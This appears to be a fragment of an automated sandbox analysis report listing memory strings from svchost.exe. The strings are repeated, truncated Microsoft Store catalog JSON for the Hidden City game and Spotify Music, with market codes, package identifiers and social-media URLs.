"TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify 